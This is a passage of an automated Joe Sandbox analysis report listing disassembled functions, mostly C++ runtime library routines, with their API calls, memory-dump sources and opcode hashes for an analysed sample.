                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                                      • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                                      • Opcode ID: f60e4f4949dbc10afeb50a2f4c162240e56049c7853c23aa9b4f53b62e5f9503
                                                                                                                                                                                                                                                                      • Instruction ID: 9f047ae140fd2a8e0a972783262a493b370d15ca472be4bedaf9813950ca4eaf
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f60e4f4949dbc10afeb50a2f4c162240e56049c7853c23aa9b4f53b62e5f9503
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19219249E1022182DB342F29D801379B2E0EF94764F64546FE8C8D7380FBA98C8297A1
                                                                                                                                                                                                                                                                      Function 00FBCCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,8F6E4A30), ref: 00FBCD1C
                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD3C
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD6D
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00FBCD86
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3604237281-0
                                                                                                                                                                                                                                                                      • Opcode ID: a5754330b93b04f0e19c5a0cc0decedb8e4a8d2715d975a7abcfc4faa872aab0
                                                                                                                                                                                                                                                                      • Instruction ID: 81b6488d9994a4c5240648e47fc70e0f9d69b2eab16f6eb5ce02bbeaad250810
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5754330b93b04f0e19c5a0cc0decedb8e4a8d2715d975a7abcfc4faa872aab0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E821B174944318ABD721DF54DC09FABBBBCEF05B24F100269F610A72C0DBB46A048BE4
                                                                                                                                                                                                                                                                      Function 00FBD7E7 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD7EE
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD7F8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD849
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD869
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: f85d06722da2166c3e1ea1427904242b048b95086ccab96810334f67a330ad4b
                                                                                                                                                                                                                                                                      • Instruction ID: cb3b5ac35997c9a15a50a12e33dab015170c3f7f7433097e6a87f33cad7641c2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f85d06722da2166c3e1ea1427904242b048b95086ccab96810334f67a330ad4b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C01A172D00119DBCB16FBA5DC42AFE77A5BF80721F240449E5006B291EF78DE01EB92
                                                                                                                                                                                                                                                                      Function 00FC27A2 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC27A9
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC27B3
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2804
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2824
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 74786d687f541ff97161b97f0ce4c20145fa7fb732d68b0344e6116cba5bf11b
                                                                                                                                                                                                                                                                      • Instruction ID: 72fe1acc6675f0176c659d669b5aa1caa031dced5fbea6437f07094de8943b2c
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74786d687f541ff97161b97f0ce4c20145fa7fb732d68b0344e6116cba5bf11b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F901A57190021ADBCB16EBA4CD42BAD7765BF84720F24040DEA00673C2CF789E02EB91
                                                                                                                                                                                                                                                                      Function 00FBD752 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FBD759
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBD763
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBD7B4
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBD7D4
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 600abc6cd49ebfcd02ab4863a5106e767c85ab9f23d8afad0d04d7f2b258c69b
                                                                                                                                                                                                                                                                      • Instruction ID: 032ec4c35e50b3638000965d38986f3863323e4e96a32d75c48259cfa9d98497
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 600abc6cd49ebfcd02ab4863a5106e767c85ab9f23d8afad0d04d7f2b258c69b
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F401A176900119DBCB15FBA4CD42AEE77A5BF84720F240509E5046B281EF789A01EB92
                                                                                                                                                                                                                                                                      Function 00FC270D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2714
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC271E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC276F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC278F
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 284e4d818be6e2be12383c5b2b23720818f5cfafae783b012f5f21f4ad2e8079
                                                                                                                                                                                                                                                                      • Instruction ID: bd1e3d03dd3103461316fb61760ac163792179746df60b6e2d6060a7f1cdaf23
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 284e4d818be6e2be12383c5b2b23720818f5cfafae783b012f5f21f4ad2e8079
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B101A17590021ADBCB15FBA4C946BBE7B65BF84720F24050DE51067282CF789A02EB91
                                                                                                                                                                                                                                                                      Function 00FC28CC Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC28D3
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC28DD
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC292E
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC294E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 2872a3de01247f5c911e38d86e74c39e6303b33aed7f43d908db5234dfcd44e3
                                                                                                                                                                                                                                                                      • Instruction ID: cadc2bfaea280f79bbf9b0a8a7eeae03e2c2c6cc11062ac013f3a14bb416d376
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2872a3de01247f5c911e38d86e74c39e6303b33aed7f43d908db5234dfcd44e3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2401A171D0021ADBCB15EBA0CD52BBE7765AF84720F24050DF51067291CF789A02EB91
                                                                                                                                                                                                                                                                      Function 00FC2837 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC283E
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2848
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2899
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC28B9
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: f1a88bdca0d9e88e14f6a5bf1471aba08f91391c759145f484365d6233ea3361
                                                                                                                                                                                                                                                                      • Instruction ID: f430e317d140d98109678537e09ec72321cda3af8ee4449ff6fc4700384ef8f4
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1a88bdca0d9e88e14f6a5bf1471aba08f91391c759145f484365d6233ea3361
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17016171D0011ADBCB15EBA4DE42BBD7766BF84720F24050EF511672D2DF789A01EB91
                                                                                                                                                                                                                                                                      Function 00FCE96D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCE974
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCE97E
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCE9CF
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCE9EF
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: e74cda38db3e77226ceb8c021172fc697eb12dfcf0a2e1bfda88f13aa38258d2
                                                                                                                                                                                                                                                                      • Instruction ID: 75ac8fae0956657a5a8c925ab87ada461a2a79cffceb6c967a262f40bd138ba2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e74cda38db3e77226ceb8c021172fc697eb12dfcf0a2e1bfda88f13aa38258d2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3501C47290011ADBCB16FBA4DE42BBE7765AF80720F25040DF5406B392CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FCEA02 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEA09
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEA13
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEA64
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEA84
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 9fdc76da4c3e41f8dfae043536aeef64319950fde3b7ec12a1bf4ecd597dfaa2
                                                                                                                                                                                                                                                                      • Instruction ID: 58d58f3442724c030b5873f698ff2ad0dac4556c43893852e60fdb8033d3a117
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fdc76da4c3e41f8dfae043536aeef64319950fde3b7ec12a1bf4ecd597dfaa2
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601A172D0021ADFCB15FBA4DA42BAD7765BF84720F29040DE5006B291CF789E01EB91
                                                                                                                                                                                                                                                                      Function 00FCEBC1 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FCEBC8
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FCEBD2
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FCEC23
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FCEC43
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
                                                                                                                                                                                                                                                                      • Opcode ID: 2c8abf11b2674ed62a5afa511cd698d8a069673c639da9869c5bb6570cede6ee
                                                                                                                                                                                                                                                                      • Instruction ID: 4c56b51e7782231402f3f1e8591051a39c30526373493aa7a3d7ea6bf948e32e
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c8abf11b2674ed62a5afa511cd698d8a069673c639da9869c5bb6570cede6ee
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF01A172D0011ADBCB15EBA4CA06BBE7765AF80720F24044DE5106B2C1CF789A01EB91
                                                                                                                                                                                                                                                                      Function 00FC2BB5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00FC2BBC
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FC2BC6
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00FB8C50
                                                                                                                                                                                                                                                                        • Part of subcall function 00FB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00FB8C78
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FC2C17
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FC2C37
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2854358121-0
